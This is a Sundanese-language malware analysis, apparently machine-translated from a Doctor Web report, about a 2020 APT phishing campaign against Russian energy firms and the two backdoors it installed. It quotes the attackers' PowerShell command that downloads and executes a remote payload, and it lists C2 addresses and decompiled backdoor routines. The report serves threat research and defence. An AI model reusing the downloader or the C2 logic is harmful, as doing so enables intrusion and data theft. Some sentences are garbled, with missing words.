Pangalaman urang dina nalungtik insiden kaamanan komputer nunjukkeun yén email masih salah sahiji saluran anu paling umum dianggo ku panyerang pikeun mimiti nembus infrastruktur jaringan anu diserang. Hiji tindakan anu teu ati-ati sareng surat anu curiga (atanapi henteu curiga) janten titik éntri pikeun inféksi salajengna, naha éta penjahat cyber aktip ngagunakeun metode rékayasa sosial, sanaos tingkat kasuksésan anu béda-béda.
Dina postingan ieu kami hoyong ngobrol ngeunaan panyilidikan panganyarna ngeunaan kampanye spam anu nargétkeun sababaraha perusahaan di kompleks bahan bakar sareng énergi Rusia. Sadaya serangan ngiringan skenario anu sami nganggo email palsu, sareng teu aya anu sigana parantos nahan seueur usaha kana eusi téks email ieu.
Jasa intél
Éta sadayana dimimitian dina ahir April 2020, nalika analis virus Doctor Web mendakan kampanye spam dimana peretas ngirim diréktori telepon anu diropéa ka karyawan sababaraha perusahaan di kompleks bahan bakar sareng énergi Rusia. Tangtosna, ieu sanés mangrupikeun perhatian anu sederhana, sabab diréktori éta henteu nyata, sareng dokumén .docx ngaunduh dua gambar tina sumber jauh.
Salah sahijina diundeur ka komputer pamaké ti server news[.]zannews[.]com. Éta noteworthy yén ngaran domain téh sarupa jeung domain sahiji puseur média anti korupsi Kazakhstan - zannews[.]kz. Di sisi séjén, domain dipaké éta geuwat reminiscent tina kampanye 2015 sejen katelah TOPNEWS, nu dipaké hiji backdoor ICEFOG sarta miboga domain kontrol Trojan jeung substring "warta" dina ngaran maranéhanana. fitur séjén metot éta nalika ngirim surelek ka panarima béda, requests pikeun ngundeur hiji gambar dipaké boh parameter pamundut béda atawa ngaran gambar unik.
Simkuring yakin yén ieu dipigawé pikeun tujuan ngumpulkeun informasi pikeun ngaidentipikasi hiji "dipercaya" addressee, anu lajeng bakal dijamin muka surat dina waktos katuhu. Protokol SMB dianggo pikeun ngaunduh gambar tina server kadua, anu tiasa dilakukeun pikeun ngumpulkeun hashes NetNTLM tina komputer karyawan anu muka dokumen anu ditampi.
Sareng ieu mangrupikeun hurup sorangan sareng diréktori palsu:
Dina Juni taun ieu, hacker mimiti ngagunakeun ngaran domain anyar, olahraga[.]manhajnews[.]com, pikeun unggah gambar. Analisis nunjukkeun yén subdomain manhajnews[.]com parantos dianggo dina milis spam sahenteuna saprak Séptémber 2019. Salah sahiji target kampanye ieu universitas Rusia badag.
Ogé, ku Juni, panitia serangan datang nepi ka téks anyar pikeun hurup maranéhanana: waktos ieu dokumén ngandung émbaran ngeunaan ngembangkeun industri. Téks surat jelas nunjukkeun yén pangarangna éta sanés spiker asli Rusia, atanapi ngahaja nyiptakeun gambaran sapertos kitu ngeunaan dirina. Hanjakal, pamanggih ngembangkeun industri, sakumaha salawasna, tétéla ngan panutup - dokumen deui diundeur dua gambar, bari server dirobah pikeun ngundeur [.]inklingpaper[.]com.
Inovasi salajengna dituturkeun dina bulan Juli. Dina usaha pikeun ngalangkungan deteksi dokumén jahat ku program antipirus, panyerang mimiti ngagunakeun dokumén Microsoft Word anu énkripsi sareng kecap akses. Dina waktos anu sami, panyerang mutuskeun pikeun ngagunakeun téknik rékayasa sosial klasik - béwara ganjaran.
Naskah banding ieu deui ditulis dina gaya anu sarua, nu ngahudangkeun kacurigaan tambahan diantara addressee nu. Server pikeun ngundeur gambar ogé teu robah.
Catet yén dina sagala hal, kotak surat éléktronik anu kadaptar dina mail[.]ru jeung yandex[.] domain ru dipaké pikeun ngirim surat.
Serangan
Dina awal Séptémber 2020, éta waktuna pikeun aksi. Analis virus urang ngarékam gelombang serangan anyar, dimana panyerang deui ngirim surat kalayan dalih pikeun ngapdet diréktori telepon. Nanging, waktos ieu lampiran ngandung makro jahat.
Nalika muka dokumén anu napel, makro nyiptakeun dua file:
- Aksara VBS% APPDATA% microsoftwindowsstart menuprogramsstartupadoba.vbs, nu dimaksudkeun pikeun ngajalankeun file bets;
- file bets sorangan% APPDATA% configstest.bat, nu ieu obfuscated.
Intina karyana turun ka ngaluncurkeun cangkang Powershell kalayan parameter anu tangtu. Parameter anu dikirimkeun ka cangkang dikodekeun kana paréntah:
$o = [activator]::CreateInstance([type]::GetTypeFromCLSID("F5078F35-C551-11D3-89B9-0000F81FE221"));$o.Open("GET", "http://newsinfo.newss.nl/nissenlist/johnlists.html", $False);$o.Send(); IEX $o.responseText;Ieu di handap tina paréntah anu disayogikeun, domain ti mana payload diunduh deui nyamar salaku situs warta. A basajan , anu tugasna ngan ukur nampi shellcode tina paréntah sareng pangendali server sareng ngalaksanakeunana. Kami tiasa ngaidentipikasi dua jinis panto tukang anu tiasa dipasang dina PC korban.
BackDoor.Siggen2.3238
Anu kahiji nyaéta BackDoor.Siggen2.3238 - spesialis kami teu acan kantos mendakan, sareng teu aya ogé anu nyebatkeun program ieu ku padagang antipirus anu sanés.
Program ieu mangrupikeun backdoor anu ditulis dina C ++ sareng dijalankeun dina sistem operasi Windows 32-bit.
BackDoor.Siggen2.3238 tiasa komunikasi sareng server manajemén nganggo dua protokol: HTTP sareng HTTPS. Sampel anu diuji ngagunakeun protokol HTTPS. Agén-pamaké di handap ieu dianggo dina pamundut ka server:
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; SE)
Dina hal ieu, sadaya pamundut disayogikeun ku set parameter ieu:
%s;type=%s;length=%s;realdata=%send
dimana unggal baris %s sasuai diganti ku:
- ID komputer anu kainféksi,
- jinis pamundut anu dikirim,
- panjang data dina widang realdata,
- data.
Dina tahap ngumpulkeun inpormasi ngeunaan sistem anu katépaan, backdoor ngahasilkeun garis sapertos:
lan=%s;cmpname=%s;username=%s;version=%s;
dimana lan mangrupikeun alamat IP komputer anu kainféksi, cmpname mangrupikeun nami komputer, nami pangguna mangrupikeun nami pangguna, versi nyaéta jalur 0.0.4.03.
Inpo ieu kalawan identifier sysinfo dikirim via pamundut POST ka server kontrol lokasina di HTTPS [:]//31.214[.]157.14/log.txt. Lamun di respon BackDoor.Siggen2.3238 nampi sinyal HEART, sambungan dianggap suksés, sarta backdoor dimimitian siklus utama komunikasi jeung server.
Katerangan lengkep ngeunaan prinsip operasi BackDoor.Siggen2.3238 aya di urang .
BackDoor.Whitebird.23
Program kadua nyaéta modifikasi backdoor BackDoor.Whitebird, geus dipikawanoh ku urang ti kajadian jeung agénsi pamaréntah di Kazakhstan. Vérsi ieu ditulis dina C ++ sarta dirancang pikeun ngajalankeun on duanana 32-bit jeung 64-bit sistem operasi Windows.
Sapertos kalolobaan program jinis ieu, BackDoor.Whitebird.23 dirancang pikeun nyieun sambungan énkripsi jeung server kontrol jeung kontrol teu sah tina komputer kainféksi. Dipasang kana sistem kompromi ngagunakeun dropper a .
Sampel anu kami pariksa nyaéta perpustakaan jahat sareng dua ékspor:
- Google Play
- Test.
Dina awal karyana, éta ngadekrip konfigurasi hardwired kana awak backdoor ngagunakeun algoritma dumasar kana operasi XOR kalawan bait 0x99. Konfigurasi Sigana mah:
struct st_cfg
{
_DWORD dword0;
wchar_t campaign[64];
wchar_t cnc_addr[256];
_DWORD cnc_port;
wchar_t cnc_addr2[100];
wchar_t cnc_addr3[100];
_BYTE working_hours[1440];
wchar_t proxy_domain[50];
_DWORD proxy_port;
_DWORD proxy_type;
_DWORD use_proxy;
_BYTE proxy_login[50];
_BYTE proxy_password[50];
_BYTE gapa8c[256];
};
Pikeun mastikeun operasi konstan na, backdoor nu robah nilai dieusian dina widang jam_kerja konfigurasi. Widang ngandung 1440 bait, anu nyandak nilai 0 atanapi 1 sareng ngagambarkeun unggal menit unggal jam dina sapoe. Nyiptakeun benang anu misah pikeun unggal antarmuka jaringan anu ngadangukeun antarmuka sareng milarian pakét otorisasi dina server proxy tina komputer anu kainféksi. Nalika pakét sapertos dideteksi, backdoor nambihan inpormasi ngeunaan server proxy kana daptarna. Salaku tambahan, pariksa ayana proxy via WinAPI InternetQueryOptionW.
Program mariksa menit sareng jam ayeuna sareng ngabandingkeunana sareng data di lapangan jam_kerja konfigurasi. Upami nilai pikeun menit anu cocog dina dinten henteu nol, teras sambungan didamel sareng server kontrol.
Ngadegkeun sambungan ka server simulates kreasi sambungan ngagunakeun versi TLS 1.0 protokol antara klien tur server. Awak backdoor ngandung dua panyangga.
Panyangga kahiji ngandung pakét Hello Client TLS 1.0.
Panyangga kadua ngandung pakét TLS 1.0 Client Key Exchange kalayan panjang konci 0x100 bait, Robah Cipher Spésifikasi, Pesen Sasalaman Énkripsi.
Nalika ngirim pakét Hello Klién, backdoor nyerat 4 bait waktos ayeuna sareng 28 bait data pseudo-acak dina widang Acak Klién, diitung kieu:
v3 = time(0);
t = (v3 >> 8 >> 16) + ((((((unsigned __int8)v3 << 8) + BYTE1(v3)) << 8) + BYTE2(v3)) << 8);
for ( i = 0; i < 28; i += 4 )
*(_DWORD *)&clientrnd[i] = t + *(_DWORD *)&cnc_addr[i / 4];
for ( j = 0; j < 28; ++j )
clientrnd[j] ^= 7 * (_BYTE)j;
Paket anu ditampi dikirim ka server kontrol. Tanggapan (Server Hello packet) cek:
- patuh kana protokol TLS versi 1.0;
- susuratan tina timestamp (nu 4 bait munggaran widang pakét Data acak) dieusian ku klien ka timestamp dieusian ku server;
- cocok tina 4 bait munggaran sanggeus timestamp dina widang Data acak tina klien tur server.
Dina kasus patandingan anu ditangtukeun, backdoor nyiapkeun pakét Client Key Exchange. Jang ngalampahkeun ieu, éta modifies Public Key dina pakét Klién Key Exchange, kitu ogé Énkripsi IV jeung Data Énkripsi dina pakét Sasalaman Pesen Énkripsi.
Backdoor teras nampi pakét ti server paréntah sareng kontrol, pariksa yén versi protokol TLS nyaéta 1.0, teras nampi 54 bait anu sanés (awak pakét). Ieu ngalengkepan setelan sambungan.
Katerangan lengkep ngeunaan prinsip operasi BackDoor.Whitebird.23 aya di urang .
Kacindekan jeung Kacindekan
Analisis dokumén, malware, sareng infrastruktur anu dianggo ngamungkinkeun urang nyarios kalayan yakin yén serangan éta disiapkeun ku salah sahiji grup APT Cina. Tempo pungsionalitas backdoors nu dipasang dina komputer korban 'dina acara serangan suksés, inféksi ngabalukarkeun, sahenteuna, ka maling informasi rahasia ti komputer organisasi diserang.
Salaku tambahan, skenario anu paling dipikaresep nyaéta pamasangan Trojans khusus dina server lokal kalayan fungsi khusus. Ieu bisa jadi controllers domain, server mail, gateways Internet, jsb Salaku urang bisa ningali dina conto , server sapertos anu dipikaresep ku panyerang pikeun sagala rupa alesan.
sumber: www.habr.com